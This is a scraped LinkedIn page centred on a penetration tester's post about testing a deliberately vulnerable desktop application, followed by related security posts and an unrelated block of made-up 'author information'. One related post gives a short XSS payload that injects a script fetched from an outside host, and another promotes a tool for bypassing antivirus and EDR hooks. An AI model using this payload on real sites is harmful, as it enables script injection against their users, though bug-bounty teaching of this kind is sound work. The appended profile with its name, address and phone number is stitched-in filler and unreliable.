Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (2024)

Akanksha Prasad

Security Consultant | Penetration Tester

  • Report this post

Hey there, fellow readers and knowledge seekers! I have documented my findings while pentesting a vulnerable desktop application, go through the below writeup for details. https://lnkd.in/duSZmf-c"Terrible Thick Client" is a vulnerable standalone desktop application developed in C# .NET framework by Kartik Durg https://lnkd.in/dk6Y7ch4Thanks to Prajyot and Akshay for the assistance!😊 #thickclient #desktopapp #pentesting #owasptop10

Terrible Thick Client Pentesting fabulous-property-93b.notion.site

531

7 Comments

Like Comment

Kuldeep V.

Assistant Technical Delivery Manager @NetSentries | OSCP | CRTP

11mo

  • Report this comment

Karan Verma Varsh*t Modi Jain

Like Reply

2Reactions 3Reactions

Mouhssine Kassih

Penetration Tester | Bug Hunter | OSCP | CRTP

11mo

  • Report this comment

Amine Amhoume

Like Reply

1Reaction 2Reactions

Kartik Durg

Gamified Cyber 𝘚𝘦𝘀𝘢𝘳π˜ͺ𝘡y | π˜–π˜šπ˜Šπ˜Œ | π˜–π˜šπ˜Šπ˜—

11mo

  • Report this comment

Hope you guys enjoyed it!

Like Reply

3Reactions 4Reactions

Thanks for sharing, Soumyadeep Basu & Akanksha Prasad.

Like Reply

1Reaction 2Reactions

Spencer Alessi

Hacker | Pentester | Active Directory Security Connoisseur | Content Creator | Ethical Threat

11mo

  • Report this comment

What a great idea!

Like Reply

1Reaction 2Reactions

Anivedh Auradkar

Cyber Security Engineer | Detection Engineering | Threat Hunter | Security Operations | Pentester | Platform Operations | LogRhythm Platform Administrator

11mo

  • Report this comment

good one! Akanksha Prasad

Like Reply

1Reaction 2Reactions

See more comments

To view or add a comment, sign in

More Relevant Posts

  • Securely Managed

    98 followers

    • Report this post

    Zero-day exploit sound scary? This type of attack exploits a software vulnerability that is unknown - developers have zero days to fix the issue or provide a patch, leaving users vulnerable until a solution is implemented!#quiztime #polloftheweek #vulnerabilityexploit #softwarevulnerability #cyberattackers #zeroday

    • Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (13)
    Like Comment

    To view or add a comment, sign in

  • CyberCureME - Cyber Security Marketplace

    8,048 followers

    • Report this post

    liveSite 2019.1 Remote Code Execution: liveSite version 2019.1 suffers from a remote code execution vulnerability.

    liveSite 2019.1 Remote Code Execution β‰ˆ Packet Storm packetstormsecurity.com
    Like Comment

    To view or add a comment, sign in

  • Anton K

    Software Engineering

    • Report this post

    We don't have to release new code on every commit.But we should have the ability to do so safely.Not because people want new code all the time (OK, they might if there's a fire).However, having the ability to release *safely* at any time is a seal of quality.It's a feather in the cap that shows that we've really done our due dilligence when it comes to bug prevention, fault-tolerance, and incident recovery.It shows that we're serious about quality.That's worth striving for.#softwareengineering

    48

    1 Comment

    Like Comment

    To view or add a comment, sign in

  • Marcus Webster

    Recruiting IoT/IIoT, Security, Embedded, Network/Device, Cybersecurity, Automotive, ICS/SCADA, Mobile, Cloud, HPC/Supercomputing Talent

    • Report this post

    #ApplicationSecurity #Vulnerabilities A cross-site scripting vulnerability in the WP-Members Membership plugin could allow attackers to inject scripts into user profile pages.The post Security Flaw in WP-Members Plugin Leads to Script Injection appeared first on SecurityWeek. https://lnkd.in/g2HuMu3S

    • Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (20)
    Like Comment

    To view or add a comment, sign in

  • vignesh Chandrasekaran

    information Security enthusiast with expertise for various areas of infosec

    • Report this post

    Ruy-LopezThis repository contains the Proof-of-Concept(PoC) for a new approach to completely prevent DLLs from being loaded into a newly spawned process.The initial use-case idea was to block AV/EDR vendor DLLs from being loaded, so that userland hooking based detections are bypassed.https://lnkd.in/gTv39m2V#infosec#pentesting#redteam #AVbypass

    GitHub - S3cur3Th1ssh*t/Ruy-Lopez github.com

    3

    Like Comment

    To view or add a comment, sign in

  • CyberCureME - Cyber Security Marketplace

    8,048 followers

    • Report this post

    E-Insurance 1.0 Cross Site Scripting: E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.

    E-Insurance 1.0 Cross Site Scripting β‰ˆ Packet Storm packetstormsecurity.com
    Like Comment

    To view or add a comment, sign in

  • Hany Soliman

    Muslim | Sr. Cyber Security Engineer , CRTE | ISO 27k LA | APISEC | OAPT | OBBH2.0 | CEH | DevSecOps | VAPT

    • Report this post

    One-Liner-CollectionsThis Repositories contains list of One Liners with Descriptions and Installation requirements.https://lnkd.in/dngvRPjP#infosec #pentesting #bugbounty

    Like Comment

    To view or add a comment, sign in

  • Cristian Zot

    -

    • Report this post

    AG Grid is one of the more expensive licenses you can find while doing a secure code review. Look for `setLicenseKey`.#pentesting #appsec #bugbountytips

    7

    Like Comment

    To view or add a comment, sign in

  • CyberCureME - Cyber Security Marketplace

    8,048 followers

    • Report this post

    Perch 3.2 Remote Code Execution: Perch version 3.2 suffers from a remote code execution vulnerability.

    Perch 3.2 Remote Code Execution β‰ˆ Packet Storm packetstormsecurity.com
    Like Comment

    To view or add a comment, sign in

  • Anton (therceman)

    Co-Founder | Ethical Hacking Expert | Sharing Bug Bounty Knowledge

    • Report this post

    Bug Bounty HintYou can demonstrate the preload and execution of an external script on your target using this XSS payload:with(document)body.appendChild(createElement('script')).src='//6a.lv'This payload is only 69 characters long.JS code: alert(document.domain)Cheers!#xss #bugbounty #bugbountytips

    • Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (31)

    99

    4 Comments

    Like Comment

    To view or add a comment, sign in

Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (35)

Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (36)

3,962 followers

  • 12 Posts

View Profile

Follow

Explore topics

  • Sales
  • Marketing
  • Business Administration
  • HR Management
  • Content Management
  • Engineering
  • Soft Skills
  • See All
Akanksha Prasad on LinkedIn: Terrible Thick Client Pentesting (2024)

References

Top Articles
Latest Posts
Article information

Author: Ray Christiansen

Last Updated:

Views: 6299

Rating: 4.9 / 5 (69 voted)

Reviews: 84% of readers found this page helpful

Author information

Name: Ray Christiansen

Birthday: 1998-05-04

Address: Apt. 814 34339 Sauer Islands, Hirtheville, GA 02446-8771

Phone: +337636892828

Job: Lead Hospitality Designer

Hobby: Urban exploration, Tai chi, Lockpicking, Fashion, Gunsmithing, Pottery, Geocaching

Introduction: My name is Ray Christiansen, I am a fair, good, cute, gentle, vast, glamorous, excited person who loves writing and wants to share my knowledge and understanding with you.